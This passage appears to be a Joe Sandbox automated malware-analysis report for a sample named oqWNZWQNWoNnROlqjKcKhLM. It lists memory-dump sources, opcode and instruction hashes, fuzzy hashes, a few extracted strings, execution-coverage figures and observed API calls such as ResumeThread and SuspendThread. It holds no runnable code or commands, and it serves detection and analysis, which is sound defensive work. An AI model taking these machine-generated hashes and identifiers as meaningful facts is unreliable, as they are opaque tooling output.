                                                    • Opcode Fuzzy Hash: 4609a6c949620fa7dfc5a58514dfdb68a2cf3c30ce9677887d1738b4f4cdad1a
                                                    • Instruction Fuzzy Hash: 91222374A4492D8FDF99EF18C898FA9B7B1FB69301F5041D9900EE7661DA31AE81CF40

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 386d8b1107e723eba68a726b2cdce6f7dd1971574749f051ce978004f54190d0
                                                    • Instruction ID: 68cf068818db323cd25dc153bc11234bf71e0080febe3853c16f26a8cb6cf0a3
                                                    • Opcode Fuzzy Hash: 386d8b1107e723eba68a726b2cdce6f7dd1971574749f051ce978004f54190d0
                                                    • Instruction Fuzzy Hash: 96029C7091891D8FDF95EF18C898BA9B7B1FB69301F1041EAD00EE76A1DA31AD85CF41
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ed15942bad109432d444d9d589d36b56e6c96ddb2d14550b5ddf9af72763394a
                                                    • Instruction ID: 23a712982f07e2523ccb825072d339b267681b8de201c4d09dca7e33e6144a88
                                                    • Opcode Fuzzy Hash: ed15942bad109432d444d9d589d36b56e6c96ddb2d14550b5ddf9af72763394a
                                                    • Instruction Fuzzy Hash: F131393191994BCFEBDADF5484916BDB7A0FF46302F50847BD00EC6991EA38AC688781
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c65b984b0044052aff741f9070a6049fbf043295aa392999955b62d6698a5d06
                                                    • Instruction ID: 35fe0cd0890ec0adfb4a2a39099f3641b101114b981b22efb02f71299f128772
                                                    • Opcode Fuzzy Hash: c65b984b0044052aff741f9070a6049fbf043295aa392999955b62d6698a5d06
                                                    • Instruction Fuzzy Hash: 5831D81091D596CEFB1B8B1454606747B61EF53321B18CAFBD09F8B4D7CA1CE89983C1
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d1b849d3f29649908e4c68dcc79c6b8996d0e5e1ffac548955e41d3563fb7a85
                                                    • Instruction ID: 1dfe987dec12fa17c44c40038b535b6e07739fa7ce560e6cf213c62d6d7498a2
                                                    • Opcode Fuzzy Hash: d1b849d3f29649908e4c68dcc79c6b8996d0e5e1ffac548955e41d3563fb7a85
                                                    • Instruction Fuzzy Hash: 1931A571D0852D8FDBA8EF14C855AE9B3F5FB68301F0081EA904EE2654CE75AAC58F81
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 012c4bc8c30f272c5f65e4c89f0cfa9a1d5afe6717b336058ebaeb01f524a898
                                                    • Instruction ID: 551a97d9083018811ddef3c98b8f383a393cca28f9c0e3ab624b81ae5329a920
                                                    • Opcode Fuzzy Hash: 012c4bc8c30f272c5f65e4c89f0cfa9a1d5afe6717b336058ebaeb01f524a898
                                                    • Instruction Fuzzy Hash: 54112721B1DE4A4FE7A89B1D181A2763BC1EB6B651B0002BFE40DC3292DE18DC0543C1
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 757dd2c3c35f103642ba908297997afa3a9fc06f601d875ffeb4769c5d23c5b1
                                                    • Instruction ID: 352e91ad2e4b01a329afb93a66165cadf62ba42d631b252b7891b7a6eb42159d
                                                    • Opcode Fuzzy Hash: 757dd2c3c35f103642ba908297997afa3a9fc06f601d875ffeb4769c5d23c5b1
                                                    • Instruction Fuzzy Hash: CF31E470919A29CEEB64EB18C8587FA77F0EF55342F4041E9E10DE2291DF38AA84DF40
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9a4716cfe5b958577433ef69b97f1599ade634ab6c68fd91d7512289fd906359
                                                    • Instruction ID: a155b22bf7daa544cf7ed3ac3f0ac0d7eaa817b0e1c983f5b045760c1c145b53
                                                    • Opcode Fuzzy Hash: 9a4716cfe5b958577433ef69b97f1599ade634ab6c68fd91d7512289fd906359
                                                    • Instruction Fuzzy Hash: FD21D576A4D28A8FF7129B68C8151F9BBB4EF92310F0485B2E048DB1D2DA38560AC795
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8e1cedbe1fd3d225c83b62f1072c5230d47328db909e1b0827c47a1afd425b95
                                                    • Instruction ID: 8dae0fb5a916e2dc8146fe4b3fa9348ed921631fbaecf6f9962d0850b5b8d59e
                                                    • Opcode Fuzzy Hash: 8e1cedbe1fd3d225c83b62f1072c5230d47328db909e1b0827c47a1afd425b95
                                                    • Instruction Fuzzy Hash: 5C11B2708497899FDB069F2888564E57FF0EF16301F0981EBE44CC7152D63DA556CB91
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9ab93c985b60787f0d4007ce2fa8ff34b4b3497731bf1ea1e0adfa86083e3b95
                                                    • Instruction ID: 514bda1faccc6dc274f69e16df85037c79eaf0a27841d635bd6176eb14b4534b
                                                    • Opcode Fuzzy Hash: 9ab93c985b60787f0d4007ce2fa8ff34b4b3497731bf1ea1e0adfa86083e3b95
                                                    • Instruction Fuzzy Hash: 57110675A4E68ACFF7129B64D8011F9BBB4EF93320F0445B6E149DB1D2CA38560D8781
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0621354588a7312a1009500e56ce0534e503136f8252d0937723fb938e368f3f
                                                    • Instruction ID: 1f44291cd99dfa601a984a14c4658939dddbc912fda4cceb8559b31659c0c791
                                                    • Opcode Fuzzy Hash: 0621354588a7312a1009500e56ce0534e503136f8252d0937723fb938e368f3f
                                                    • Instruction Fuzzy Hash: FA11C131A19A8AABE759DB1C8091668F3B1FF467547108279C04ECB286CF24FC1A87C5
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dbec0d924cfd4e6bde052234837bf32e4af9fa06e53f5ab7503069c8131fc53f
                                                    • Instruction ID: f5c31e000a3f791aa70ad6cfa3aee030a29e0c2c8165ec9ea89828d3e355f262
                                                    • Opcode Fuzzy Hash: dbec0d924cfd4e6bde052234837bf32e4af9fa06e53f5ab7503069c8131fc53f
                                                    • Instruction Fuzzy Hash: CE11A332E1AA49DFF749AB6C98527E8B7D1EF46320B50417BD05EC2183EE18A8598381
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 32d4a2d812872bafb7c69ab6a844833899265a37c2420a8fda3834ffe40490b4
                                                    • Instruction ID: 8708707c0d5f003cb93b037c9336951246be03fd77a8f8cbb43a89afac3da3c4
                                                    • Opcode Fuzzy Hash: 32d4a2d812872bafb7c69ab6a844833899265a37c2420a8fda3834ffe40490b4
                                                    • Instruction Fuzzy Hash: BB21E230959A2ECEEB64EB14CC547FAB2B1FB55342F0041EAD40DE2291EF786A84DF40
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7e5fe71cf4407825764a8aad994a0b754fb7812e8e2c771a49ba34bda38d0c13
                                                    • Instruction ID: 04dffd736d1142f353eeaf1710d1dfbd8c7c927d7e0a2680ab312893857e4748
                                                    • Opcode Fuzzy Hash: 7e5fe71cf4407825764a8aad994a0b754fb7812e8e2c771a49ba34bda38d0c13
                                                    • Instruction Fuzzy Hash: 4B21F730959A2ACEEB64DB14CC947FA76B4EB45342F0041F9E10DA2291DF78AB84DF40
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC5B5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B5000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac5b5000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f0eeab6d77b9adc69c6c05c88e09fd30dc076ab62a9b4435b8fb866127c08272
                                                    • Instruction ID: ebafc7b1a56257712be437d817f3cadd67d8f89c96585f8860ab7b8be4ee705a
                                                    • Opcode Fuzzy Hash: f0eeab6d77b9adc69c6c05c88e09fd30dc076ab62a9b4435b8fb866127c08272
                                                    • Instruction Fuzzy Hash: 89112A70808A8D8FDF85EF68C859AEA7FF0FF29301F0545AAE409D7261DB349954CB81
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8756ec48a22613f66a2e1424ba55d75f04fea5847b1b96cdc46ee3eb03c6b0d7
                                                    • Instruction ID: 9b78461b4747de1d4f5db9ad10395080f12c16bcb8b12923e7aaf5ed7aa1c7d6
                                                    • Opcode Fuzzy Hash: 8756ec48a22613f66a2e1424ba55d75f04fea5847b1b96cdc46ee3eb03c6b0d7
                                                    • Instruction Fuzzy Hash: 0D11173556864DCFCB48EF28C881AEA77E4FF59304F0542AAE84DD7251C731E569CB81
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC5B5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B5000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac5b5000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 010e78bc6cc7ecfb918cc1f400afc9d580105f857c0aefd29ffdc0a3fc10dd69
                                                    • Instruction ID: dce8c30235375c80bbddf97aebc581ad06a47d5d45ce1f200d336ccb412343e6
                                                    • Opcode Fuzzy Hash: 010e78bc6cc7ecfb918cc1f400afc9d580105f857c0aefd29ffdc0a3fc10dd69
                                                    • Instruction Fuzzy Hash: 69112A70808A8D8FDF85EF68C859AA97FF0FF29300F0445AAE419D71A2D774D554CB81
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b3ec1a50e177a0db9602f5712c3cabf44ba26e866889be409da81dd7766dfd7e
                                                    • Instruction ID: 6b42bbf2411adf95bb81cac20be1e1901aad9bd931b81cfc6f35491a16e52118
                                                    • Opcode Fuzzy Hash: b3ec1a50e177a0db9602f5712c3cabf44ba26e866889be409da81dd7766dfd7e
                                                    • Instruction Fuzzy Hash: 3311E57590E28ACFF7169F64C8051F9BBB0EF93310F0485B6E049DB1E2DA38A608C781
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e04186bcfd4331f98c1ec81794a63995ea26cdf0b2890372336e89750d9780ed
                                                    • Instruction ID: 368d41c9d8ba672dbdbe60886c097b436a632f96f14cf7e58b3e1a1d1982bf09
                                                    • Opcode Fuzzy Hash: e04186bcfd4331f98c1ec81794a63995ea26cdf0b2890372336e89750d9780ed
                                                    • Instruction Fuzzy Hash: 7401D471959A954FDB19AB7994119EAB7E0EF55300B4046BAD48FC74D3CD28F40D83C0
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC5B5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B5000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac5b5000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 34a34d899681d2d41189e2a3fc1718b259617440c40c1b1a803ba397d228660c
                                                    • Instruction ID: 83dc0006a5a753cb05f86a00459eefe32c48ec8045d8017b1396f9958aa3c3fe
                                                    • Opcode Fuzzy Hash: 34a34d899681d2d41189e2a3fc1718b259617440c40c1b1a803ba397d228660c
                                                    • Instruction Fuzzy Hash: F8019E75C4A64EDFEB50EF6884496B97FA4EF55300F4441FAE40DC7452EA34E6988780
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 794a41ab53eefce973e64ad4f88a4a07bfae810bb81aef0d33044f912ee3cfe1
                                                    • Instruction ID: f1e422b8374e1d2a47d629ce1ef41dd79d8d3a9601cb598400469f05c8497b84
                                                    • Opcode Fuzzy Hash: 794a41ab53eefce973e64ad4f88a4a07bfae810bb81aef0d33044f912ee3cfe1
                                                    • Instruction Fuzzy Hash: 7A01717080868D8FDB85DF18C495AA97FB0FF66301F0940DAD408C71A2DB359955CB80
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d8a6ccfe6508b397ead5896d87e24add40ba00598f65e541c9d82c87afe47900
                                                    • Instruction ID: d19d881b4c939fd122a174c8bf312da0e63bb1495b5b41e5ba7e8ffee308fbdd
                                                    • Opcode Fuzzy Hash: d8a6ccfe6508b397ead5896d87e24add40ba00598f65e541c9d82c87afe47900
                                                    • Instruction Fuzzy Hash: B701847190844DDFDF54EB64C465FF87BB0EF1A300F1800AC804ED3692CE289946CB50
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: af0a475532214e457358f9382cbd367406674661fc2b7af4bd29a0f5df1a07d6
                                                    • Instruction ID: bfbd4304307c019061052e1b32130a2ed76b9012c9dda2abb9da304c334527a6
                                                    • Opcode Fuzzy Hash: af0a475532214e457358f9382cbd367406674661fc2b7af4bd29a0f5df1a07d6
                                                    • Instruction Fuzzy Hash: 1C014F7180968DCBEB52EF6884525E97BA0FF56300F4881A6E40C86192DA29E964C781
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 55ea75d5fe55bd4418b7a22c56786ac6cebde619ba360927198c58bc6581faa3
                                                    • Instruction ID: fd646f75d920fa3b7ced021be15baeccbef89289e1de9998dac0ebde23854427
                                                    • Opcode Fuzzy Hash: 55ea75d5fe55bd4418b7a22c56786ac6cebde619ba360927198c58bc6581faa3
                                                    • Instruction Fuzzy Hash: 09016070D09A2C8FDF98DF18D894BA8B7B1FB69300F10819AD04EE7290CB719A84CF14
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: c9$!k9$"s9$#{9
                                                    • API String ID: 0-1692736845

                                                    Execution Graph

                                                    Execution Coverage:5.1%
                                                    Dynamic/Decrypted Code Coverage:75%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:12
                                                    Total number of Limit Nodes:0
                                                    Execution graph nodes (API calls): ResumeThread, SuspendThread, CloseHandle, GetFileAttributesW

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem$)rem
                                                    • API String ID: 0-3729628724

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem$)rem
                                                    • API String ID: 0-3729628724

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem
                                                    • API String ID: 0-2156003729

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem$)rem$)rem
                                                    • API String ID: 0-1029889671
                                                    • Opcode ID: 969caa022eb45dfb6211cae5fe4400e66b5c29a5097a4a63977b89efca5b513c
                                                    • Instruction ID: e10f933576bf5dd67ff656eaf0d51dab6e2ffef7f8b5f87de5276ce3b6478788
                                                    • Opcode Fuzzy Hash: 969caa022eb45dfb6211cae5fe4400e66b5c29a5097a4a63977b89efca5b513c
                                                    • Instruction Fuzzy Hash: 1971E531A1DA46AFF3A8AB2C9451579B7E0FF86311B14853ED09FC3192DE28F44A87D1

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem$)rem
                                                    • API String ID: 0-3729628724
                                                    • Opcode ID: ca2fdad4d0250cb27b1e4814806da7f2b8482628ab1668318b28c3f53a4c57ff
                                                    • Instruction ID: 76db5b0b3beddfc35e63acf532422d01e441b289e20e54777da266e8d6c83453
                                                    • Opcode Fuzzy Hash: ca2fdad4d0250cb27b1e4814806da7f2b8482628ab1668318b28c3f53a4c57ff
                                                    • Instruction Fuzzy Hash: 87E12E70A19A8D8FEBB8EF18C855BE937E1FB59301F00812AD84EDB651DF749584CB81

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem$)rem
                                                    • API String ID: 0-3729628724
                                                    • Opcode ID: f058c18538e869f0778e9ccdc7b5df3e9725439341490ff4f8176af0f0f04f6f
                                                    • Instruction ID: 6fa8e36251cc675b82c51a4f2976243be848cdeb11ccb5d39aa77400706821b7
                                                    • Opcode Fuzzy Hash: f058c18538e869f0778e9ccdc7b5df3e9725439341490ff4f8176af0f0f04f6f
                                                    • Instruction Fuzzy Hash: 43D1E030A1FA069FE3A9CB28D49157577E1FF46300B1085BEC49FC7686DE29F84A8781

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem$)rem
                                                    • API String ID: 0-3729628724
                                                    • Opcode ID: f016a6345b5aa5715245c6df1a0a530751da2cec40bfde9122ad19b71d0af6dd
                                                    • Instruction ID: c72d4f261ddf2a2605d74cc6c7ab15429a6d2a5ff841948770e776eae934fed1
                                                    • Opcode Fuzzy Hash: f016a6345b5aa5715245c6df1a0a530751da2cec40bfde9122ad19b71d0af6dd
                                                    • Instruction Fuzzy Hash: ABC1A370A19A46EFE789DB68C0906A4B7E1FF46300F54817DD05FCBA96CB28F85587C1

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem$)rem
                                                    • API String ID: 0-3729628724
                                                    • Opcode ID: f2c8a7480507fa04e08bbfbb559d9bc0c08dd849040fac584446395467ed1b87
                                                    • Instruction ID: 02a74c9bc5d8c69b444f844b0abc2570ae0f2aea55195466d835daf05f8b8863
                                                    • Opcode Fuzzy Hash: f2c8a7480507fa04e08bbfbb559d9bc0c08dd849040fac584446395467ed1b87
                                                    • Instruction Fuzzy Hash: 2511C131A1990A9FEB94EB28D4009F973A0EF56351F40853AE04FC7892CE28F84987A1

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem$)rem
                                                    • API String ID: 0-3729628724
                                                    • Opcode ID: 45366e7e3012429f1c552dfd06dcc0d0394c1573c96acba8dd977534d8328171
                                                    • Instruction ID: c200b56d4685522502111da55d2b8cbc9281ea31663ea4c63c5965abfdd1f647
                                                    • Opcode Fuzzy Hash: 45366e7e3012429f1c552dfd06dcc0d0394c1573c96acba8dd977534d8328171
                                                    • Instruction Fuzzy Hash: D2114431A0A50B9FF7449F18D4006E933A0EF56361F10813AE81FCB6C1CA29F894C7A1

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f32986a256e0aff0e0d3947b4d3f2a5df0f9f5164c590ebeeede6352cf18af70
                                                    • Instruction ID: 257f972b84e4eb8d4923e64c8e513279a13ac37d0e90804684bbb9714a4fe06f
                                                    • Opcode Fuzzy Hash: f32986a256e0aff0e0d3947b4d3f2a5df0f9f5164c590ebeeede6352cf18af70
                                                    • Instruction Fuzzy Hash: 8CF27470A1891D8FDF99EB18C894FA9B7B1FB69305F1041E9900EE7691DE31AE85CF40

                                                    Control-flow Graph

